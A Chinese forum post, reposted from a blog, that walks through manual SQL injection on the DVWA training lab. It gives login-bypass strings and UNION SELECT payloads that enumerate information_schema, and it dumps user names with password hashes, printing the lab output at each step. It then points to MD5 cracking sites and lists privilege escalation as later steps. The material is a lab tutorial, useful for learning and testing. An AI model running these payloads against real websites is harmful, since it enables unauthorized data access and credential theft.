发帖
翼度科技»论坛 编程开发 mysql 查看内容

SQL手工注入

用户雾里看花

14

主题

14

帖子

42

积分

新手上路

Rank: 1

积分
42
显示全部楼层
两要素


  • 用户能够控制输入的内容
  • web应用把用户输入的内容,在没有经过过滤或者严格过滤的情况下带入到数据库中执行
分类


  • GET和POST
  • 整数型,字符型,搜索型
万能密码

’1 or 1 = 1#
1 or 1 = 1#
注释符:


  • -- (后面有空格)
  • --+
  • %23
注入流程:


  • 判断是否有注入信息
  • 获取数据库基本信息
  • 获取数据库名
  • 获取表名
  • 获取列名
  • 获取用户数据
  • 破解加密数据
  • 提权
  • 内网渗透
判断是否存在注入,判断注入类型-第一步
  1. 1 or 1 = 1#
  2. 1' or 1 = 1#
复制代码
注:
get传参方式中大概率存在url编码
%20-->空格
%23--> 井号
%3d-->等号
加号可以代替空格
union select 注入-第二步
  1. 1' order by 1 --
  2. 1' order by 2 --
  3. 1' or 1 = 1 order by n --
复制代码
判断列数可以使用二分法
假如只有两列,order by 3,那么就会报错-->用于判断列数
union:联合,合并。将多条查询语句的结果合并成一个结果
要求:

  • 多条查询语句的查询列数是一致的
  • union关键字默认去重,如果使用union all可以包含重复项
union联合注入-第三步

获取数据库中的信息:判断显示位
  1. 1' union select 1,2--
复制代码
这里使用-1使union之前的语句查询无结果,则显示的时候就会显示union之后的第二条语句
DVWA:
  1. ID: 1' union select 1,2 #  
  2. First name: admin  
  3. Surname: admin
  5. ID: 1' union select 1,2 #  
  6. First name: 1 #显示位1
  7. Surname: 2 #显示位2
复制代码
union联合注入-第四步

获取数据库中的信息:用户、版本、数据库名
  1. 1' union select version(),user()#
复制代码
常用函数:
user()返回当前使用数据库的用户
version()返回当前数据库版本
database()返回当前使用的数据库版本
DVWA
  1. 1' union select database(),user()#
  3. ID: 1' union select database(),user()#  
  4. First name: admin  
  5. Surname: admin
  7. ID: 1' union select database(),user()#  
  8. First name: dvwa  #数据库名
  9. Surname: root@localhost  #用户名
复制代码
union联合注入-第五步

获取数据库信息:

  • SCHEMATA表:当前MYsql中所有数据库的信息。show databases命令:命令从这个表获取数据
  • TABALES表:存储数据库中的表信息(包括视图),包括表属于哪个数据库,表的类型,存储引擎,创建时间等信息。show tables from database命令:从这个表获取结果
  • COLUMNS表:存储表中的列信息,包括表有多少列,每个列的类型等。show columns from tablename命令,从这个表获取结果
mysql中的user表中有两列:user,password两列中存在登录数据库的用户名和密码
查询库名
  1. 1' union select 1,schema_name from information_schema.schemata
  3. # 查询information_schema库中的schemeta表
复制代码

DVWA
  1. ID: 1' union select 1,schema_name from information_schema.schemata#  
  2. First name: admin  
  3. Surname: admin
  5. ID: 1' union select 1,schema_name from information_schema.schemata#  
  6. First name: 1  
  7. Surname: information_schema
  9. ID: 1' union select 1,schema_name from information_schema.schemata#  
  10. First name: 1  
  11. Surname: challenges
  13. ID: 1' union select 1,schema_name from information_schema.schemata#  
  14. First name: 1  
  15. Surname: dvwa
  17. ID: 1' union select 1,schema_name from information_schema.schemata#  
  18. First name: 1  
  19. Surname: mysql
  21. ID: 1' union select 1,schema_name from information_schema.schemata#  
  22. First name: 1  
  23. Surname: performance_schema
  25. ID: 1' union select 1,schema_name from information_schema.schemata#  
  26. First name: 1  
  27. Surname: security
  29. ID: 1' union select 1,schema_name from information_schema.schemata#  
  30. First name: 1  
  31. Surname: test
复制代码
查询表名
  1. 1' union select 1,table_name from information_schema.tables where table_schema = database()#
  2. 这一步可以跳过库查询
  4. 1' union select 1,table_name from information_schema.tables where table_schema = 'dvwa'#
复制代码

DVWA
  1. ID: 1' union select 1,table_name from information_schema.tables where table_schema = 'dvwa'#  
  2. First name: admin  
  3. Surname: admin
  5. ID: 1' union select 1,table_name from information_schema.tables where table_schema = 'dvwa'#  
  6. First name: 1  
  7. Surname: guestbook
  9. ID: 1' union select 1,table_name from information_schema.tables where table_schema = 'dvwa'#  
  10. First name: 1  
  11. Surname: users
复制代码
查询列名
  1. 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #
  3. 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = database() #
复制代码

DVWA
  1. ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
  2. First name: admin  
  3. Surname: admin
  5. ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
  6. First name: 1  
  7. Surname: user_id
  9. ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
  10. First name: 1  
  11. Surname: first_name
  13. ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
  14. First name: 1  
  15. Surname: last_name
  17. ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
  18. First name: 1  
  19. Surname: user
  21. ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
  22. First name: 1  
  23. Surname: password
  25. ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
  26. First name: 1  
  27. Surname: avatar
  29. ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
  30. First name: 1  
  31. Surname: last_login
  33. ID: 1' union select 1,column_name from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' #  
  34. First name: 1  
  35. Surname: failed_login
复制代码
查询数据(利用列名、表名)
  1. 1' union select user,password from users #
复制代码
DVWA
  1. ID: 1' union select user,password from users #  
  2. First name: admin  
  3. Surname: admin
  5. ID: 1' union select user,password from users #  
  6. First name: admin  
  7. Surname: 5f4dcc3b5aa765d61d8327deb882cf99
  9. ID: 1' union select user,password from users #  
  10. First name: gordonb  
  11. Surname: e99a18c428cb38d5f260853678922e03
  13. ID: 1' union select user,password from users #  
  14. First name: 1337  
  15. Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
  17. ID: 1' union select user,password from users #  
  18. First name: pablo  
  19. Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
  21. ID: 1' union select user,password from users #  
  22. First name: smithy  
  23. Surname: 5f4dcc3b5aa765d61d8327deb882cf99
复制代码
union联合注入

字符串拼接
常用函数:
  1. concat():将多个字符连接成一个字符串拼接
  2. select concat('M','y','S','Q','L')
  4. concat_ws():将多个字符串连接成一个字符串,但可以指定分隔符
  5. select concat_ws('_','M','y','S','Q','L')
  7. group_concat():将多行结果连在一起
  8. select group_concat(user)from user;
复制代码
DVWA
  1. ID: 1' union select 1,concat_ws('_',user,password) from users #  
  2. First name: admin  
  3. Surname: admin
  5. ID: 1' union select 1,concat_ws('_',user,password) from users #  
  6. First name: 1  
  7. Surname: admin_5f4dcc3b5aa765d61d8327deb882cf99
  9. ID: 1' union select 1,concat_ws('_',user,password) from users #  
  10. First name: 1  
  11. Surname: gordonb_e99a18c428cb38d5f260853678922e03
  13. ID: 1' union select 1,concat_ws('_',user,password) from users #  
  14. First name: 1  
  15. Surname: 1337_8d3533d75ae2c3966d7e0d4fcc69216b
  17. ID: 1' union select 1,concat_ws('_',user,password) from users #  
  18. First name: 1  
  19. Surname: pablo_0d107d09f5bbe40cade3de5c71e9e9b7
  21. ID: 1' union select 1,concat_ws('_',user,password) from users #  
  22. First name: 1  
  23. Surname: smithy_5f4dcc3b5aa765d61d8327deb882cf99
复制代码
解密-第六步

https://cmd5.com/
https://www.somd5.com/
数据库自己的账号密码加密是mysql5的加密方式

来源:https://www.cnblogs.com/p1ggy/p/17991560
免责声明:由于采集信息均来自互联网,如果侵犯了您的权益,请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x

上一篇: SQL报错注入

下一篇: 记一次MySQL从节点服务器宕机重启后,从节点出现主键冲突异常的处理

发表于 2024-1-28 02:16:58

举报 回复 使用道具

返回列表 发新帖

Archiver|手机版|小黑屋|翼度科技

Copyright © 2001-2020, Tencent Cloud. Powered by Discuz! X3.4